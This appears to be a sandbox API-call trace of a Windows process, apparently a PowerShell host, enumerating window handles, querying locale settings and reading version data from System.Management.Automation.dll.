	[0049.352] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.352] GetLastError () returned 0x514
	[0049.352] GetWindowThreadProcessId (in: hWnd=0x10070, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.352] GetLastError () returned 0x514
	[0049.352] GetWindowThreadProcessId (in: hWnd=0x20020, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.352] GetLastError () returned 0x514
	[0049.352] GetWindowThreadProcessId (in: hWnd=0x20022, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.352] GetLastError () returned 0x514
	[0049.352] GetWindowThreadProcessId (in: hWnd=0x5008c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.353] GetLastError () returned 0x514
	[0049.353] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.353] GetLastError () returned 0x514
	[0049.353] GetWindowThreadProcessId (in: hWnd=0x10042, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x73c
	[0049.353] GetLastError () returned 0x514
	[0049.353] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x73c
	[0049.353] GetLastError () returned 0x514
	[0049.353] GetWindowThreadProcessId (in: hWnd=0x90050, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xef0
	[0049.353] GetLastError () returned 0x514
	[0049.353] GetWindowThreadProcessId (in: hWnd=0x20280, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xe14
	[0049.353] GetLastError () returned 0x514
	[0049.353] GetWindowThreadProcessId (in: hWnd=0x201a0, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcac
	[0049.353] GetLastError () returned 0x514
	[0049.353] GetWindowThreadProcessId (in: hWnd=0x30132, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xd54
	[0049.353] GetLastError () returned 0x514
	[0049.353] GetWindowThreadProcessId (in: hWnd=0x20092, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.354] GetLastError () returned 0x514
	[0049.354] GetWindowThreadProcessId (in: hWnd=0x2023e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcac
	[0049.354] GetLastError () returned 0x514
	[0049.354] GetWindowThreadProcessId (in: hWnd=0x1020e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.354] GetLastError () returned 0x514
	[0049.354] GetWindowThreadProcessId (in: hWnd=0x101fe, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.354] GetLastError () returned 0x514
	[0049.354] GetWindowThreadProcessId (in: hWnd=0x101e2, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.354] GetLastError () returned 0x514
	[0049.354] GetWindowThreadProcessId (in: hWnd=0x101e0, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.354] GetLastError () returned 0x514
	[0049.354] GetWindowThreadProcessId (in: hWnd=0x101da, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.354] GetLastError () returned 0x514
	[0049.354] GetWindowThreadProcessId (in: hWnd=0x101d0, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.354] GetLastError () returned 0x514
	[0049.354] GetWindowThreadProcessId (in: hWnd=0x101ce, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.355] GetLastError () returned 0x514
	[0049.355] GetWindowThreadProcessId (in: hWnd=0x30158, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.355] GetLastError () returned 0x514
	[0049.355] GetWindowThreadProcessId (in: hWnd=0x200d0, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.355] GetLastError () returned 0x514
	[0049.355] GetWindowThreadProcessId (in: hWnd=0x300aa, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.355] GetLastError () returned 0x514
	[0049.355] GetWindowThreadProcessId (in: hWnd=0x30098, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.355] GetLastError () returned 0x514
	[0049.355] GetWindowThreadProcessId (in: hWnd=0x200a6, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.355] GetLastError () returned 0x514
	[0049.355] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.355] GetLastError () returned 0x514
	[0049.355] GetWindowThreadProcessId (in: hWnd=0x300b2, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.355] GetLastError () returned 0x514
	[0049.356] GetWindowThreadProcessId (in: hWnd=0x200d4, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.356] GetLastError () returned 0x514
	[0049.356] GetWindowThreadProcessId (in: hWnd=0x1024a, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.356] GetLastError () returned 0x514
	[0049.356] GetWindowThreadProcessId (in: hWnd=0x1023a, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcac
	[0049.356] GetLastError () returned 0x514
	[0049.356] GetWindowThreadProcessId (in: hWnd=0x10236, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcd0
	[0049.356] GetLastError () returned 0x514
	[0049.356] GetWindowThreadProcessId (in: hWnd=0x10232, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xccc
	[0049.356] GetLastError () returned 0x514
	[0049.356] GetWindowThreadProcessId (in: hWnd=0x1022c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcc8
	[0049.356] GetLastError () returned 0x514
	[0049.356] GetWindowThreadProcessId (in: hWnd=0x200fa, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcac
	[0049.356] GetLastError () returned 0x514
	[0049.356] GetWindowThreadProcessId (in: hWnd=0x200f8, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcac
	[0049.356] GetLastError () returned 0x514
	[0049.357] GetWindowThreadProcessId (in: hWnd=0x201ea, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.357] GetLastError () returned 0x514
	[0049.357] GetWindowThreadProcessId (in: hWnd=0x10222, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcac
	[0049.357] GetLastError () returned 0x514
	[0049.357] GetWindowThreadProcessId (in: hWnd=0x10216, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc98
	[0049.357] GetLastError () returned 0x514
	[0049.357] GetWindowThreadProcessId (in: hWnd=0x1020a, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.357] GetLastError () returned 0x514
	[0049.357] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.357] GetLastError () returned 0x514
	[0049.357] GetWindowThreadProcessId (in: hWnd=0x101b6, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.357] GetLastError () returned 0x514
	[0049.357] GetWindowThreadProcessId (in: hWnd=0x101b4, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.357] GetLastError () returned 0x514
	[0049.357] GetWindowThreadProcessId (in: hWnd=0x10192, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb74
	[0049.357] GetLastError () returned 0x514
	[0049.358] GetWindowThreadProcessId (in: hWnd=0x1018e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb64
	[0049.358] GetLastError () returned 0x514
	[0049.358] GetWindowThreadProcessId (in: hWnd=0x1018a, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb54
	[0049.358] GetLastError () returned 0x514
	[0049.358] GetWindowThreadProcessId (in: hWnd=0x10186, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb44
	[0049.358] GetLastError () returned 0x514
	[0049.358] GetWindowThreadProcessId (in: hWnd=0x10182, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb34
	[0049.358] GetLastError () returned 0x514
	[0049.358] GetWindowThreadProcessId (in: hWnd=0x1017e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb24
	[0049.358] GetLastError () returned 0x514
	[0049.358] GetWindowThreadProcessId (in: hWnd=0x1017a, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb14
	[0049.358] GetLastError () returned 0x514
	[0049.358] GetWindowThreadProcessId (in: hWnd=0x20176, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb04
	[0049.358] GetLastError () returned 0x514
	[0049.359] GetWindowThreadProcessId (in: hWnd=0x10172, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xaf4
	[0049.359] GetLastError () returned 0x514
	[0049.359] GetWindowThreadProcessId (in: hWnd=0x1016e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xae4
	[0049.359] GetLastError () returned 0x514
	[0049.359] GetWindowThreadProcessId (in: hWnd=0x1016a, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xad4
	[0049.359] GetLastError () returned 0x514
	[0049.359] GetWindowThreadProcessId (in: hWnd=0x10166, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xac4
	[0049.359] GetLastError () returned 0x514
	[0049.359] GetWindowThreadProcessId (in: hWnd=0x10162, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xab0
	[0049.359] GetLastError () returned 0x514
	[0049.360] GetWindowThreadProcessId (in: hWnd=0x1015e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xaa0
	[0049.360] GetLastError () returned 0x514
	[0049.360] GetWindowThreadProcessId (in: hWnd=0x700ec, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xa7c
	[0049.360] GetLastError () returned 0x514
	[0049.360] GetWindowThreadProcessId (in: hWnd=0x10156, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x89c
	[0049.360] GetLastError () returned 0x514
	[0049.360] GetWindowThreadProcessId (in: hWnd=0x10142, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x8b0
	[0049.360] GetLastError () returned 0x514
	[0049.360] GetWindowThreadProcessId (in: hWnd=0x7013a, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x8a4
	[0049.360] GetLastError () returned 0x514
	[0049.360] GetWindowThreadProcessId (in: hWnd=0x20134, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x8b0
	[0049.360] GetLastError () returned 0x514
	[0049.360] GetWindowThreadProcessId (in: hWnd=0x1011c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x8a4
	[0049.360] GetLastError () returned 0x514
	[0049.360] GetWindowThreadProcessId (in: hWnd=0x10114, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x8b0
	[0049.360] GetLastError () returned 0x514
	[0049.361] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x89c
	[0049.361] GetLastError () returned 0x514
	[0049.361] GetWindowThreadProcessId (in: hWnd=0x10108, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x89c
	[0049.361] GetLastError () returned 0x514
	[0049.361] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x5b4
	[0049.361] GetLastError () returned 0x514
	[0049.361] GetWindowThreadProcessId (in: hWnd=0x100f0, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x7c0
	[0049.361] GetLastError () returned 0x514
	[0049.361] GetWindowThreadProcessId (in: hWnd=0x50086, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.361] GetLastError () returned 0x514
	[0049.361] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x234
	[0049.361] GetLastError () returned 0x514
	[0049.361] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.361] GetLastError () returned 0x514
	[0049.361] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.361] GetLastError () returned 0x514
	[0049.362] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.362] GetLastError () returned 0x514
	[0049.362] GetWindowThreadProcessId (in: hWnd=0x100f4, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x450
	[0049.362] GetLastError () returned 0x514
	[0049.362] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.362] GetLastError () returned 0x514
	[0049.362] GetWindowThreadProcessId (in: hWnd=0x20018, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.362] GetLastError () returned 0x514
	[0049.362] GetWindowThreadProcessId (in: hWnd=0x20030, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x450
	[0049.362] GetLastError () returned 0x514
	[0049.362] GetWindowThreadProcessId (in: hWnd=0x30034, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x450
	[0049.362] GetLastError () returned 0x514
	[0049.362] GetWindowThreadProcessId (in: hWnd=0x10044, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x758
	[0049.362] GetLastError () returned 0x514
	[0049.362] GetWindowThreadProcessId (in: hWnd=0x10036, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x594
	[0049.362] GetLastError () returned 0x514
	[0049.362] GetWindowThreadProcessId (in: hWnd=0x30026, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x56c
	[0049.362] GetLastError () returned 0x514
	[0049.362] GetWindowThreadProcessId (in: hWnd=0x1003a, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x73c
	[0049.362] GetLastError () returned 0x514
	[0049.362] GetWindowThreadProcessId (in: hWnd=0x2002e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x508
	[0049.362] GetLastError () returned 0x514
	[0049.362] GetWindowThreadProcessId (in: hWnd=0x100da, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x450
	[0049.363] GetLastError () returned 0x514
	[0049.363] GetWindowThreadProcessId (in: hWnd=0x1012c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x8f0
	[0049.363] GetLastError () returned 0x514
	[0049.363] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.363] GetLastError () returned 0x514
	[0049.363] GetWindowThreadProcessId (in: hWnd=0x2001a, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x47c
	[0049.363] GetLastError () returned 0x514
	[0049.363] GetWindowThreadProcessId (in: hWnd=0x6004e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xf00
	[0049.363] GetLastError () returned 0x514
	[0049.363] GetWindowThreadProcessId (in: hWnd=0x2027e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xe14
	[0049.363] GetLastError () returned 0x514
	[0049.363] GetWindowThreadProcessId (in: hWnd=0x10250, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcac
	[0049.363] GetLastError () returned 0x514
	[0049.363] GetWindowThreadProcessId (in: hWnd=0x10224, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcac
	[0049.363] GetLastError () returned 0x514
	[0049.363] GetWindowThreadProcessId (in: hWnd=0x40052, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xd54
	[0049.363] GetLastError () returned 0x514
	[0049.363] GetWindowThreadProcessId (in: hWnd=0x10204, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.363] GetLastError () returned 0x514
	[0049.363] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xc3c
	[0049.363] GetLastError () returned 0x514
	[0049.363] GetWindowThreadProcessId (in: hWnd=0x10238, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcd0
	[0049.363] GetLastError () returned 0x514
	[0049.364] GetWindowThreadProcessId (in: hWnd=0x10234, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xccc
	[0049.364] GetLastError () returned 0x514
	[0049.364] GetWindowThreadProcessId (in: hWnd=0x1022e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xcc8
	[0049.364] GetLastError () returned 0x514
	[0049.364] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb74
	[0049.364] GetLastError () returned 0x514
	[0049.364] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb64
	[0049.364] GetLastError () returned 0x514
	[0049.364] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb54
	[0049.364] GetLastError () returned 0x514
	[0049.364] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb44
	[0049.364] GetLastError () returned 0x514
	[0049.364] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb34
	[0049.364] GetLastError () returned 0x514
	[0049.364] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb24
	[0049.364] GetLastError () returned 0x514
	[0049.364] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb14
	[0049.364] GetLastError () returned 0x514
	[0049.364] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xb04
	[0049.364] GetLastError () returned 0x514
	[0049.364] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xaf4
	[0049.364] GetLastError () returned 0x514
	[0049.364] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xae4
	[0049.364] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xad4
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xac4
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xab0
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xaa0
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0xa7c
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x1011e, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x8a4
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x10116, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x8b0
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x1010c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x89c
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x10046, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x758
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x10038, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x594
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x2002c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x56c
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x1003c, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x73c
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x100fe, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x450
	[0049.365] GetLastError () returned 0x514
	[0049.365] GetWindowThreadProcessId (in: hWnd=0x20032, lpdwProcessId=0x22e3e0 | out: lpdwProcessId=0x22e3e0) returned 0x450
	[0049.366] GetLastError () returned 0x514
	[0049.366] GetLastError () returned 0x514
	[0049.367] WerSetFlags () returned 0x0
	[0049.373] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0049.376] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x22e7bc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x22e7b8 | out: pulNumLanguages=0x22e7bc, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x22e7b8) returned 1
	[0049.376] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x22e7bc, pwszLanguagesBuffer=0x1f2da78, pcchLanguagesBuffer=0x22e7b8 | out: pulNumLanguages=0x22e7bc, pwszLanguagesBuffer=0x1f2da78, pcchLanguagesBuffer=0x22e7b8) returned 1
	[0049.379] GetUserDefaultLocaleName (in: lpLocaleName=0x3c3520, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0049.397] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0049.397] GetLastError () returned 0xcb
	[0049.399] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0049.399] GetLastError () returned 0xcb
	[0049.400] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3c3520, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0049.400] GetLastError () returned 0xcb
	[0049.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22e22c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0049.407] GetLastError () returned 0xcb
	[0049.407] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22e248, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0049.407] GetLastError () returned 0xcb
	[0049.407] SetErrorMode (uMode=0x1) returned 0x1
	[0049.407] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x22e6c8 | out: lpFileInformation=0x22e6c8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa963141, ftCreationTime.dwHighDateTime=0x1cb88fa, ftLastAccessTime.dwLowDateTime=0xa963141, ftLastAccessTime.dwHighDateTime=0x1cb88fa, ftLastWriteTime.dwLowDateTime=0xa9892a1, ftLastWriteTime.dwHighDateTime=0x1cb88fa, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0049.407] GetLastError () returned 0xcb
	[0049.407] SetErrorMode (uMode=0x1) returned 0x1
	[0049.407] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x22e74c | out: lpdwHandle=0x22e74c) returned 0x94c
	[0049.412] GetLastError () returned 0x0
	[0049.412] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1f2ffa8 | out: lpData=0x1f2ffa8) returned 1
	[0049.414] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22e718, puLen=0x22e714 | out: lplpBuffer=0x22e718*=0x1f30044, puLen=0x22e714) returned 1
	[0049.414] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x22e694, puLen=0x22e690 | out: lplpBuffer=0x22e694*=0x1f30120, puLen=0x22e690) returned 1
	[0049.414] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0049.414] lstrcpyW (in: lpString1=0x3c3520, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0049.414] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x22e694, puLen=0x22e690 | out: lplpBuffer=0x22e694*=0x1f30174, puLen=0x22e690) returned 1
	[0049.414] lstrlenW (lpString="System.Management.Automation") returned 28
	[0049.414] lstrcpyW (in: lpString1=0x3c3520, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0049.414] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x22e694, puLen=0x22e690 | out: lplpBuffer=0x22e694*=0x1f301d0, puLen=0x22e690) returned 1
	[0049.414] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0049.414] lstrcpyW (in: lpString1=0x3c3520, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0049.414] VerQueryValueW (in: pBlock=0x1f2ffa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x22e694, puLen=0x22e690 | out: lplpBuffer=0x22e694*=0x1f30210, puLen=0x22e690) returned 1
	[0049.414] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0049.414] lstrcpyW (in: lpString1=0x3c3520, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
